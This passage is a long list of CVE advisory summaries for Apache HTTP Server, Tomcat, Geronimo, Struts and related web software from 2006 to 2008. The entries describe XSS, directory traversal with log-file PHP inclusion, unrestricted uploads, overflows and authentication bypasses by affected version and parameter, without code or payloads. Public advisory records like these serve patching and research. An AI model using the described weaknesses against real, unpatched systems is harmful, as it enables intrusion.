8939| [CVE-2008-1232] Cross-site scripting (XSS) vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16 allows remote attackers to inject arbitrary web script or HTML via a crafted string that is used in the message argument to the HttpServletResponse.sendError method.
8940| [CVE-2008-0869] Cross-site scripting (XSS) vulnerability in BEA WebLogic Workshop 8.1 through SP6 and Workshop for WebLogic 9.0 through 10.0 allows remote attackers to inject arbitrary web script or HTML via a "framework defined request parameter" when using WebLogic Workshop or Apache Beehive NetUI framework with page flows.
8941| [CVE-2008-0732] The init script for Apache Geronimo on SUSE Linux follows symlinks when performing a chown operation, which might allow local users to obtain access to unspecified files or directories.
8942| [CVE-2008-0555] The ExpandCert function in Apache-SSL before apache_1.3.41+ssl_1.59 does not properly handle (1) '/' and (2) '=' characters in a Distinguished Name (DN) in a client certificate, which might allow remote attackers to bypass authentication via a crafted DN that triggers overwriting of environment variables.
8943| [CVE-2008-0457] Unrestricted file upload vulnerability in the FileUpload class running on the Symantec LiveState Apache Tomcat server, as used by Symantec Backup Exec System Recovery Manager 7.0 and 7.0.1, allows remote attackers to upload and execute arbitrary JSP files via unknown vectors.
8944| [CVE-2008-0456] CRLF injection vulnerability in the mod_negotiation module in the Apache HTTP Server 2.2.6 and earlier in the 2.2.x series, 2.0.61 and earlier in the 2.0.x series, and 1.3.39 and earlier in the 1.3.x series allows remote authenticated users to inject arbitrary HTTP headers and conduct HTTP response splitting attacks by uploading a file with a multi-line name containing HTTP header sequences and a file extension, which leads to injection within a (1) "406 Not Acceptable" or (2) "300 Multiple Choices" HTTP response when the extension is omitted in a request for the file.
8945| [CVE-2008-0455] Cross-site scripting (XSS) vulnerability in the mod_negotiation module in the Apache HTTP Server 2.2.6 and earlier in the 2.2.x series, 2.0.61 and earlier in the 2.0.x series, and 1.3.39 and earlier in the 1.3.x series allows remote authenticated users to inject arbitrary web script or HTML by uploading a file with a name containing XSS sequences and a file extension, which leads to injection within a (1) "406 Not Acceptable" or (2) "300 Multiple Choices" HTTP response when the extension is omitted in a request for the file.
8946| [CVE-2008-0128] The SingleSignOn Valve (org.apache.catalina.authenticator.SingleSignOn) in Apache Tomcat before 5.5.21 does not set the secure flag for the JSESSIONIDSSO cookie in an https session, which can cause the cookie to be sent in http requests and make it easier for remote attackers to capture this cookie.
8947| [CVE-2008-0005] mod_proxy_ftp in Apache 2.2.x before 2.2.7-dev, 2.0.x before 2.0.62-dev, and 1.3.x before 1.3.40-dev does not define a charset, which allows remote attackers to conduct cross-site scripting (XSS) attacks using UTF-7 encoding.
8948| [CVE-2008-0002] Apache Tomcat 6.0.0 through 6.0.15 processes parameters in the context of the wrong request when an exception occurs during parameter processing, which might allow remote attackers to obtain sensitive information, as demonstrated by disconnecting during this processing in order to trigger the exception.
8949| [CVE-2007-6750] The Apache HTTP Server 1.x and 2.x allows remote attackers to cause a denial of service (daemon outage) via partial HTTP requests, as demonstrated by Slowloris, related to the lack of the mod_reqtimeout module in versions before 2.2.15.
8950| [CVE-2007-6726] Multiple cross-site scripting (XSS) vulnerabilities in Dojo 0.4.1 and 0.4.2, as used in Apache Struts and other products, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors involving (1) xip_client.html and (2) xip_server.html in src/io/.
8951| [CVE-2007-6514] Apache HTTP Server, when running on Linux with a document root on a Windows share mounted using smbfs, allows remote attackers to obtain unprocessed content such as source files for .php programs via a trailing "\" (backslash), which is not handled by the intended AddType directive.
8952| [CVE-2007-6423] ** DISPUTED ** Unspecified vulnerability in mod_proxy_balancer for Apache HTTP Server 2.2.x before 2.2.7-dev, when running on Windows, allows remote attackers to trigger memory corruption via a long URL. NOTE: the vendor could not reproduce this issue.
8953| [CVE-2007-6422] The balancer_handler function in mod_proxy_balancer in the Apache HTTP Server 2.2.0 through 2.2.6, when a threaded Multi-Processing Module is used, allows remote authenticated users to cause a denial of service (child process crash) via an invalid bb variable.
8954| [CVE-2007-6421] Cross-site scripting (XSS) vulnerability in balancer-manager in mod_proxy_balancer in the Apache HTTP Server 2.2.0 through 2.2.6 allows remote attackers to inject arbitrary web script or HTML via the (1) ss, (2) wr, or (3) rr parameters, or (4) the URL.
8955| [CVE-2007-6420] Cross-site request forgery (CSRF) vulnerability in the balancer-manager in mod_proxy_balancer for Apache HTTP Server 2.2.x allows remote attackers to gain privileges via unspecified vectors.
8956| [CVE-2007-6388] Cross-site scripting (XSS) vulnerability in mod_status in the Apache HTTP Server 2.2.0 through 2.2.6, 2.0.35 through 2.0.61, and 1.3.2 through 1.3.39, when the server-status page is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
8957| [CVE-2007-6361] Gekko 0.8.2 and earlier stores sensitive information under the web root with possibly insufficient access control, which might allow remote attackers to read certain files under temp/, as demonstrated by a log file that records the titles of blog entries. NOTE: access to temp/ is blocked by .htaccess in most deployments that use Apache HTTP Server.
8958| [CVE-2007-6342] SQL injection vulnerability in the David Castro AuthCAS module (AuthCAS.pm) 0.4 for the Apache HTTP Server allows remote attackers to execute arbitrary SQL commands via the SESSION_COOKIE_NAME (session ID) in a cookie.
8959| [CVE-2007-6286] Apache Tomcat 5.5.11 through 5.5.25 and 6.0.0 through 6.0.15, when the native APR connector is used, does not properly handle an empty request to the SSL port, which allows remote attackers to trigger handling of "a duplicate copy of one of the recent requests," as demonstrated by using netcat to send the empty request.
8960| [CVE-2007-6258] Multiple stack-based buffer overflows in the legacy mod_jk2 2.0.3-DEV and earlier Apache module allow remote attackers to execute arbitrary code via a long (1) Host header, or (2) Hostname within a Host header.
8961| [CVE-2007-6231] Multiple PHP remote file inclusion vulnerabilities in tellmatic 1.0.7 allow remote attackers to execute arbitrary PHP code via a URL in the tm_includepath parameter to (1) Classes.inc.php, (2) statistic.inc.php, (3) status.inc.php, (4) status_top_x.inc.php, or (5) libchart-1.1/libchart.php in include/. NOTE: access to include/ is blocked by .htaccess in most deployments that use Apache HTTP Server.
8962| [CVE-2007-6203] Apache HTTP Server 2.0.x and 2.2.x does not sanitize the HTTP Method specifier header from an HTTP request when it is reflected back in a "413 Request Entity Too Large" error message, which might allow cross-site scripting (XSS) style attacks using web client components that can send arbitrary headers in requests, as demonstrated via an HTTP request containing an invalid Content-length value, a similar issue to CVE-2006-3918.
8963| [CVE-2007-5797] SQLLoginModule in Apache Geronimo 2.0 through 2.1 does not throw an exception for a nonexistent username, which allows remote attackers to bypass authentication via a login attempt with any username not contained in the database.
8964| [CVE-2007-5731] Absolute path traversal vulnerability in Apache Jakarta Slide 2.1 and earlier allows remote authenticated users to read arbitrary files via a WebDAV write request that specifies an entity with a SYSTEM tag, a related issue to CVE-2007-5461.
8965| [CVE-2007-5461] Absolute path traversal vulnerability in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0, 5.0.0, 5.5.0 through 5.5.25, and 6.0.0 through 6.0.14, under certain configurations, allows remote authenticated users to read arbitrary files via a WebDAV write request that specifies an entity with a SYSTEM tag.
8966| [CVE-2007-5342] The default catalina.policy in the JULI logging component in Apache Tomcat 5.5.9 through 5.5.25 and 6.0.0 through 6.0.15 does not restrict certain permissions for web applications, which allows attackers to modify logging configuration options and overwrite arbitrary files, as demonstrated by changing the (1) level, (2) directory, and (3) prefix attributes in the org.apache.juli.FileHandler handler.
8967| [CVE-2007-5333] Apache Tomcat 6.0.0 through 6.0.14, 5.5.0 through 5.5.25, and 4.1.0 through 4.1.36 does not properly handle (1) double quote (") characters or (2) %5C (encoded backslash) sequences in a cookie value, which might cause sensitive information such as session IDs to be leaked to remote attackers and enable session hijacking attacks. NOTE: this issue exists because of an incomplete fix for CVE-2007-3385.
8968| [CVE-2007-5156] Incomplete blacklist vulnerability in editor/filemanager/upload/php/upload.php in FCKeditor, as used in SiteX CMS 0.7.3.beta, La-Nai CMS, Syntax CMS, Cardinal Cms, and probably other products, allows remote attackers to upload and execute arbitrary PHP code via a file whose name contains ".php." and has an unknown extension, which is recognized as a .php file by the Apache HTTP server, a different vulnerability than CVE-2006-0658 and CVE-2006-2529.
8969| [CVE-2007-5085] Unspecified vulnerability in the management EJB (MEJB) in Apache Geronimo before 2.0.2 allows remote attackers to bypass authentication and obtain "access to Geronimo internals" via unspecified vectors.
8970| [CVE-2007-5000] Cross-site scripting (XSS) vulnerability in the (1) mod_imap module in the Apache HTTP Server 1.3.0 through 1.3.39 and 2.0.35 through 2.0.61 and the (2) mod_imagemap module in the Apache HTTP Server 2.2.0 through 2.2.6 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
8971| [CVE-2007-4724] Cross-site request forgery (CSRF) vulnerability in cal2.jsp in the calendar examples application in Apache Tomcat 4.1.31 allows remote attackers to add events as arbitrary users via the time and description parameters.
8972| [CVE-2007-4723] Directory traversal vulnerability in Ragnarok Online Control Panel 4.3.4a, when the Apache HTTP Server is used, allows remote attackers to bypass authentication via directory traversal sequences in a URI that ends with the name of a publicly available page, as demonstrated by a "/...../" sequence and an account_manage.php/login.php final component for reaching the protected account_manage.php page.
8973| [CVE-2007-4641] Directory traversal vulnerability in index.php in Pakupaku CMS 0.4 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the page parameter, as demonstrated by injecting code into an Apache log file.
8974| [CVE-2007-4556] Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via form input beginning with a "%{" sequence and ending with a "}" character.
8975| [CVE-2007-4548] The login method in LoginModule implementations in Apache Geronimo 2.0 does not throw FailedLoginException for failed logins, which allows remote attackers to bypass authentication requirements, deploy arbitrary modules, and gain administrative access by sending a blank username and password with the command line deployer in the deployment module.
8976| [CVE-2007-4465] Cross-site scripting (XSS) vulnerability in mod_autoindex.c in the Apache HTTP Server before 2.2.6, when the charset on a server-generated page is not defined, allows remote attackers to inject arbitrary web script or HTML via the P parameter using the UTF-7 charset. NOTE: it could be argued that this issue is due to a design limitation of browsers that attempt to perform automatic content type detection.
8977| [CVE-2007-3847] The date handling code in modules/proxy/proxy_util.c (mod_proxy) in Apache 2.3.0, when using a threaded MPM, allows remote origin servers to cause a denial of service (caching forward proxy process crash) via crafted date headers that trigger a buffer over-read.
8978| [CVE-2007-3571] The Apache Web Server as used in Novell NetWare 6.5 and GroupWise allows remote attackers to obtain sensitive information via a certain directive to Apache that causes the HTTP-Header response to be modified, which may reveal the server's internal IP address.
8979| [CVE-2007-3386] Cross-site scripting (XSS) vulnerability in the Host Manager Servlet for Apache Tomcat 6.0.0 to 6.0.13 and 5.5.0 to 5.5.24 allows remote attackers to inject arbitrary HTML and web script via crafted requests, as demonstrated using the aliases parameter to an html/add action.
8980| [CVE-2007-3385] Apache Tomcat 6.0.0 to 6.0.13, 5.5.0 to 5.5.24, 5.0.0 to 5.0.30, 4.1.0 to 4.1.36, and 3.3 to 3.3.2 does not properly handle the \" character sequence in a cookie value, which might cause sensitive information such as session IDs to be leaked to remote attackers and enable session hijacking attacks.
8981| [CVE-2007-3384] Multiple cross-site scripting (XSS) vulnerabilities in examples/servlet/CookieExample in Apache Tomcat 3.3 through 3.3.2 allow remote attackers to inject arbitrary web script or HTML via the (1) Name or (2) Value field, related to error messages.
8982| [CVE-2007-3383] Cross-site scripting (XSS) vulnerability in SendMailServlet in the examples web application (examples/jsp/mail/sendmail.jsp) in Apache Tomcat 4.0.0 through 4.0.6 and 4.1.0 through 4.1.36 allows remote attackers to inject arbitrary web script or HTML via the From field and possibly other fields, related to generation of error messages.
8983| [CVE-2007-3382] Apache Tomcat 6.0.0 to 6.0.13, 5.5.0 to 5.5.24, 5.0.0 to 5.0.30, 4.1.0 to 4.1.36, and 3.3 to 3.3.2 treats single quotes ("'") as delimiters in cookies, which might cause sensitive information such as session IDs to be leaked and allow remote attackers to conduct session hijacking attacks.
8984| [CVE-2007-3304] Apache httpd 1.3.37, 2.0.59, and 2.2.4 with the Prefork MPM module, allows local users to cause a denial of service by modifying the worker_score and process_score arrays to reference an arbitrary process ID, which is sent a SIGUSR1 signal from the master process, aka "SIGUSR1 killer."
8985| [CVE-2007-3303] Apache httpd 2.0.59 and 2.2.4, with the Prefork MPM module, allows local users to cause a denial of service via certain code sequences executed in a worker process that (1) stop request processing by killing all worker processes and preventing creation of replacements or (2) hang the system by forcing the master process to fork an arbitrarily large number of worker processes. NOTE: This might be an inherent design limitation of Apache with respect to worker processes in hosted environments.
8986| [CVE-2007-3101] Multiple cross-site scripting (XSS) vulnerabilities in certain JSF applications in Apache MyFaces Tomahawk before 1.1.6 allow remote attackers to inject arbitrary web script via the autoscroll parameter, which is injected into Javascript that is sent to the client.
8987| [CVE-2007-2450] Multiple cross-site scripting (XSS) vulnerabilities in the (1) Manager and (2) Host Manager web applications in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.24, and 6.0.0 through 6.0.13 allow remote authenticated users to inject arbitrary web script or HTML via a parameter name to manager/html/upload, and other unspecified vectors.
8988| [CVE-2007-2449] Multiple cross-site scripting (XSS) vulnerabilities in certain JSP files in the examples web application in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.24, and 6.0.0 through 6.0.13 allow remote attackers to inject arbitrary web script or HTML via the portion of the URI after the '
8989| [CVE-2007-2353] Apache Axis 1.0 allows remote attackers to obtain sensitive information by requesting a non-existent WSDL file, which reveals the installation path in the resulting exception message.
8990| [CVE-2007-2025] Unrestricted file upload vulnerability in the UpLoad feature (lib/plugin/UpLoad.php) in PhpWiki 1.3.11p1 allows remote attackers to upload arbitrary PHP files with a double extension, as demonstrated by .php.3, which is interpreted by Apache as being a valid PHP file.
8991| [CVE-2007-1863] cache_util.c in the mod_cache module in Apache HTTP Server (httpd), when caching is enabled and a threaded Multi-Processing Module (MPM) is used, allows remote attackers to cause a denial of service (child processing handler crash) via a request with the (1) s-maxage, (2) max-age, (3) min-fresh, or (4) max-stale Cache-Control headers without a value.
8992| [CVE-2007-1862] The recall_headers function in mod_mem_cache in Apache 2.2.4 does not properly copy all levels of header data, which can cause Apache to return HTTP headers containing previously used data, which could be used by remote attackers to obtain potentially sensitive information.
8993| [CVE-2007-1860] mod_jk in Apache Tomcat JK Web Server Connector 1.2.x before 1.2.23 decodes request URLs within the Apache HTTP Server before passing the URL to Tomcat, which allows remote attackers to access protected pages via a crafted prefix JkMount, possibly involving double-encoded .. (dot dot) sequences and directory traversal, a related issue to CVE-2007-0450.
8994| [CVE-2007-1858] The default SSL cipher configuration in Apache Tomcat 4.1.28 through 4.1.31, 5.0.0 through 5.0.30, and 5.5.0 through 5.5.17 uses certain insecure ciphers, including the anonymous cipher, which allows remote attackers to obtain sensitive information or have other, unspecified impacts.
8995| [CVE-2007-1842] Directory traversal vulnerability in login.php in JSBoard before 2.0.12 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the table parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, a related issue to CVE-2006-2019.
8996| [CVE-2007-1801] Directory traversal vulnerability in inc/lang.php in sBLOG 0.7.3 Beta allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the conf_lang_default parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by inc/lang.php.
8997| [CVE-2007-1743] suexec in Apache HTTP Server (httpd) 2.2.3 does not verify combinations of user and group IDs on the command line, which might allow local users to leverage other vulnerabilities to create arbitrary UID/GID owned files if /proc is mounted. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root." In addition, because this is dependent on other vulnerabilities, perhaps this is resultant and should not be included in CVE.
8998| [CVE-2007-1742] suexec in Apache HTTP Server (httpd) 2.2.3 uses a partial comparison for verifying whether the current directory is within the document root, which might allow local users to perform unauthorized operations on incorrect directories, as demonstrated using "html_backup" and "htmleditor" under an "html" directory. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root."
8999| [CVE-2007-1741] Multiple race conditions in suexec in Apache HTTP Server (httpd) 2.2.3 between directory and file validation, and their usage, allow local users to gain privileges and execute arbitrary code by renaming directories or performing symlink attacks. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root."
9000| [CVE-2007-1720] Directory traversal vulnerability in addressbook.php in the Addressbook 1.2 module for PHP-Nuke allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the module_name parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file.
9001| [CVE-2007-1636] Directory traversal vulnerability in index.php in RoseOnlineCMS 3 B1 allows remote attackers to include arbitrary files via a .. (dot dot) sequence in the op parameter, as demonstrated by injecting PHP code into Apache log files via the URL and User-Agent HTTP header.
9002| [CVE-2007-1633] Directory traversal vulnerability in bbcode_ref.php in the Giorgio Ciranni Splatt Forum 4.0 RC1 module for PHP-Nuke allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the name parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by bbcode_ref.php.
9003| [CVE-2007-1577] Directory traversal vulnerability in index.php in GeBlog 0.1 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the GLOBALS[tplname] parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
9004| [CVE-2007-1539] Directory traversal vulnerability in inc/map.func.php in pragmaMX Landkarten 2.1 module allows remote attackers to include arbitrary files via a .. (dot dot) sequence in the module_name parameter, as demonstrated via a static PHP code injection attack in an Apache log file.
9005| [CVE-2007-1524] Directory traversal vulnerability in themes/default/ in ZomPlog 3.7.6 and earlier allows remote attackers to include arbitrary local files via a .. (dot dot) in the settings[skin] parameter, as demonstrated by injecting PHP code into an Apache HTTP Server log file, which can then be included via themes/default/.
9006| [CVE-2007-1491] Apache Tomcat in Avaya S87XX, S8500, and S8300 before CM 3.1.3, and Avaya SES allows connections from external interfaces via port 8009, which exposes it to attacks from outside parties.
9007| [CVE-2007-1358] Cross-site scripting (XSS) vulnerability in certain applications using Apache Tomcat 4.0.0 through 4.0.6 and 4.1.0 through 4.1.34 allows remote attackers to inject arbitrary web script or HTML via crafted "Accept-Language headers that do not conform to RFC 2616".
9008| [CVE-2007-1349] PerlRun.pm in Apache mod_perl before 1.30, and RegistryCooker.pm in mod_perl 2.x, does not properly escape PATH_INFO before use in a regular expression, which allows remote attackers to cause a denial of service (resource consumption) via a crafted URI.
9009| [CVE-2007-0975] Variable extraction vulnerability in Ian Bezanson Apache Stats before 0.0.3 beta allows attackers to overwrite critical variables, with unknown impact, when the extract function is used on the _REQUEST superglobal array.
9010| [CVE-2007-0930] Variable extract vulnerability in Apache Stats before 0.0.3beta allows attackers to modify arbitrary variables and conduct attacks via unknown vectors involving the use of PHP's extract function.
9011| [CVE-2007-0792] The mod_perl initialization script in Bugzilla 2.23.3 does not set the Bugzilla Apache configuration to allow .htaccess permissions to override file permissions, which allows remote attackers to obtain the database username and password via a direct request for the localconfig file.
9012| [CVE-2007-0774] Stack-based buffer overflow in the map_uri_to_worker function (native/common/jk_uri_worker_map.c) in mod_jk.so for Apache Tomcat JK Web Server Connector 1.2.19 and 1.2.20, as used in Tomcat 4.1.34 and 5.5.20, allows remote attackers to execute arbitrary code via a long URL that triggers the overflow in a URI worker map routine.
9013| [CVE-2007-0637] Directory traversal vulnerability in zd_numer.php in Galeria Zdjec 3.0 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the galeria parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by zd_numer.php.
9014| [CVE-2007-0451] Apache SpamAssassin before 3.1.8 allows remote attackers to cause a denial of service via long URLs in malformed HTML, which triggers "massive memory usage."
9015| [CVE-2007-0450] Directory traversal vulnerability in Apache HTTP Server and Tomcat 5.x before 5.5.22 and 6.x before 6.0.10, when using certain proxy modules (mod_proxy, mod_rewrite, mod_jk), allows remote attackers to read arbitrary files via a .. (dot dot) sequence with combinations of (1) "/" (slash), (2) "\" (backslash), and (3) URL-encoded backslash (%5C) characters in the URL, which are valid separators in Tomcat but not in Apache.
9016| [CVE-2007-0419] The BEA WebLogic Server proxy plug-in before June 2006 for the Apache HTTP Server does not properly handle protocol errors, which allows remote attackers to cause a denial of service (server outage).
9017| [CVE-2007-0173] Directory traversal vulnerability in index.php in L2J Statistik Script 0.09 and earlier, when register_globals is enabled and magic_quotes is disabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the page parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
9018| [CVE-2007-0098] Directory traversal vulnerability in language.php in VerliAdmin 0.3 and earlier, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the lang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by language.php.
9019| [CVE-2007-0086] ** DISPUTED ** The Apache HTTP Server, when accessed through a TCP connection with a large window size, allows remote attackers to cause a denial of service (network bandwidth consumption) via a Range header that specifies multiple copies of the same fragment. NOTE: the severity of this issue has been disputed by third parties, who state that the large window size required by the attack is not normally supported or configured by the server, or that a DDoS-style attack would accomplish the same goal.
9020| [CVE-2006-7217] Apache Derby before 10.2.1.6 does not determine schema privilege requirements during the DropSchemaNode bind phase, which allows remote authenticated users to execute arbitrary drop schema statements in SQL authorization mode.
9021| [CVE-2006-7216] Apache Derby before 10.2.1.6 does not determine privilege requirements for lock table statements at compilation time, and consequently does not enforce privilege requirements at execution time, which allows remote authenticated users to lock arbitrary tables.
9022| [CVE-2006-7197] The AJP connector in Apache Tomcat 5.5.15 uses an incorrect length for chunks, which can cause a buffer over-read in the ajp_process_callback in mod_jk, which allows remote attackers to read portions of sensitive memory.
9023| [CVE-2006-7196] Cross-site scripting (XSS) vulnerability in the calendar application example in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.31, 5.0.0 through 5.0.30, and 5.5.0 through 5.5.15 allows remote attackers to inject arbitrary web script or HTML via the time parameter to cal2.jsp and possibly unspecified other vectors. NOTE: this may be related to CVE-2006-0254.1.
9024| [CVE-2006-7195] Cross-site scripting (XSS) vulnerability in implicit-objects.jsp in Apache Tomcat 5.0.0 through 5.0.30 and 5.5.0 through 5.5.17 allows remote attackers to inject arbitrary web script or HTML via certain header values.
9025| [CVE-2006-7098] The Debian GNU/Linux 033_-F_NO_SETSID patch for the Apache HTTP Server 1.3.34-4 does not properly disassociate httpd from a controlling tty when httpd is started interactively, which allows local users to gain privileges to that tty via a CGI program that calls the TIOCSTI ioctl.
9026| [CVE-2006-6869] Directory traversal vulnerability in includes/search/search_mdforum.php in MAXdev MDForum 2.0.1 and earlier, when magic_quotes_gpc is disabled and register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang cookie to error.php, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
9027| [CVE-2006-6675] Cross-site scripting (XSS) vulnerability in Novell NetWare 6.5 Support Pack 5 and 6 and Novell Apache on NetWare 2.0.48 allows remote attackers to inject arbitrary web script or HTML via unspecified parameters in Welcome web-app.
9028| [CVE-2006-6613] Directory traversal vulnerability in language.php in phpAlbum 0.4.1 Beta 6 and earlier, when magic_quotes_gpc is disabled and register_globals is enabled, allows remote attackers to include and execute arbitrary local files or obtain sensitive information via a .. (dot dot) in the pa_lang[include_file] parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by language.php.
9029| [CVE-2006-6589] Cross-site scripting (XSS) vulnerability in ecommerce/control/keywordsearch in the Apache Open For Business Project (OFBiz) and Opentaps 0.9.3 allows remote attackers to inject arbitrary web script or HTML via the SEARCH_STRING parameter, a different issue than CVE-2006-6587. NOTE: some of these details are obtained from third party information.
9030| [CVE-2006-6588] The forum implementation in the ecommerce component in the Apache Open For Business Project (OFBiz) trusts the (1) dataResourceTypeId, (2) contentTypeId, and certain other hidden form fields, which allows remote attackers to create unauthorized types of content, modify content, or have other unknown impact.
9031| [CVE-2006-6587] Cross-site scripting (XSS) vulnerability in the forum implementation in the ecommerce component in the Apache Open For Business Project (OFBiz) allows remote attackers to inject arbitrary web script or HTML by posting a message.
9032| [CVE-2006-6445] Directory traversal vulnerability in error.php in Envolution 1.1.0 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang (PNSV lang) parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
9033| [CVE-2006-6071] TWiki 4.0.5 and earlier, when running under Apache 1.3 using ApacheLogin with sessions and "ErrorDocument 401" redirects to a valid wiki topic, does not properly handle failed login attempts, which allows remote attackers to read arbitrary content by cancelling out of a failed authentication with a valid username and invalid password.
9034| [CVE-2006-6047] Directory traversal vulnerability in manager/index.php in Etomite 0.6.1.2 allows remote authenticated administrators to include and execute arbitrary local files via a .. (dot dot) in the f parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
9035| [CVE-2006-5894] Directory traversal vulnerability in lang.php in Rama CMS 0.68 and earlier, when register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the lang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by lang.php.
9036| [CVE-2006-5752] Cross-site scripting (XSS) vulnerability in mod_status.c in the mod_status module in Apache HTTP Server (httpd), when ExtendedStatus is enabled and a public server-status page is used, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving charsets with browsers that perform "charset detection" when the content-type is not specified.
9037| [CVE-2006-5733] Directory traversal vulnerability in error.php in PostNuke 0.763 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang (PNSV lang) cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
9038| [CVE-2006-5263] Directory traversal vulnerability in templates/header.php3 in phpMyAgenda 3.1 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the language parameter, as demonstrated by a parameter value naming an Apache HTTP Server log file that apparently contains PHP code.
9039| [CVE-2006-4994] Multiple unquoted Windows search path vulnerabilities in Apache Friends XAMPP 1.5.2 might allow local users to gain privileges via a malicious program file in %SYSTEMDRIVE%, which is run when XAMPP attempts to execute (1) FileZillaServer.exe, (2) mysqld-nt.exe, (3) Perl.exe, or (4) xamppcontrol.exe with an unquoted "Program Files" pathname.
9040| [CVE-2006-4636] Directory traversal vulnerability in SZEWO PhpCommander 3.0 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Directory parameter, as demonstrated by parameter values naming Apache HTTP Server log files that apparently contain PHP code.
9041| [CVE-2006-4625] PHP 4.x up to 4.4.4 and PHP 5 up to 5.1.6 allows local users to bypass certain Apache HTTP Server httpd.conf options, such as safe_mode and open_basedir, via the ini_restore function, which resets the values to their php.ini (Master Value) defaults.
9042| [CVE-2006-4558] DeluxeBB 1.06 and earlier, when run on the Apache HTTP Server with the mod_mime module, allows remote attackers to execute arbitrary PHP code by uploading files with double extensions via the fileupload parameter in a newthread action in newpost.php.
9043| [CVE-2006-4191] Directory traversal vulnerability in memcp.php in XMB (Extreme Message Board) 1.9.6 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the langfilenew parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by header.php.
9044| [CVE-2006-4154] Format string vulnerability in the mod_tcl module 1.0 for Apache 2.x allows context-dependent attackers to execute arbitrary code via format string specifiers that are not properly handled in a set_var function call in (1) tcl_cmds.c and (2) tcl_core.c.
9045| [CVE-2006-4110] Apache 2.2.2, when running on Windows, allows remote attackers to read source code of CGI programs via a request that contains uppercase (or alternate case) characters that bypass the case-sensitive ScriptAlias directive, but allow access to the file on case-insensitive file systems.
9046| [CVE-2006-4004] Directory traversal vulnerability in index.php in vbPortal 3.0.2 through 3.6.0 Beta 1, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the bbvbplang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
9047| [CVE-2006-3918] http_protocol.c in (1) IBM HTTP Server 6.0 before 6.0.2.13 and 6.1 before 6.1.0.1, and (2) Apache HTTP Server 1.3 before 1.3.35, 2.0 before 2.0.58, and 2.2 before 2.2.2, does not sanitize the Expect header from an HTTP request when it is reflected back in an error message, which might allow cross-site scripting (XSS) style attacks using web client components that can send arbitrary headers in requests, as demonstrated using a Flash SWF file.
9048| [CVE-2006-3835] Apache Tomcat 5 before 5.5.17 allows remote attackers to list directories via a semicolon (
9049| [CVE-2006-3747] Off-by-one error in the ldap scheme handling in the Rewrite module (mod_rewrite) in Apache 1.3 from 1.3.28, 2.0.46 and other versions before 2.0.59, and 2.2, when RewriteEngine is enabled, allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via crafted URLs that are not properly handled using certain rewrite rules.
9050| [CVE-2006-3362] Unrestricted file upload vulnerability in connectors/php/connector.php in FCKeditor mcpuk file manager, as used in (1) Geeklog 1.4.0 through 1.4.0sr3, (2) toendaCMS 1.0.0 Shizouka Stable and earlier, (3) WeBid 0.5.4, and possibly other products, when installed on Apache with mod_mime, allows remote attackers to upload and execute arbitrary PHP code via a filename with a .php extension and a trailing extension that is allowed, such as .zip.
9051| [CVE-2006-3102] Race condition in articles/BitArticle.php in Bitweaver 1.3, when run on Apache with the mod_mime extension, allows remote attackers to execute arbitrary PHP code by uploading arbitrary files with double extensions, which are stored for a small period of time under the webroot in the temp/articles directory.
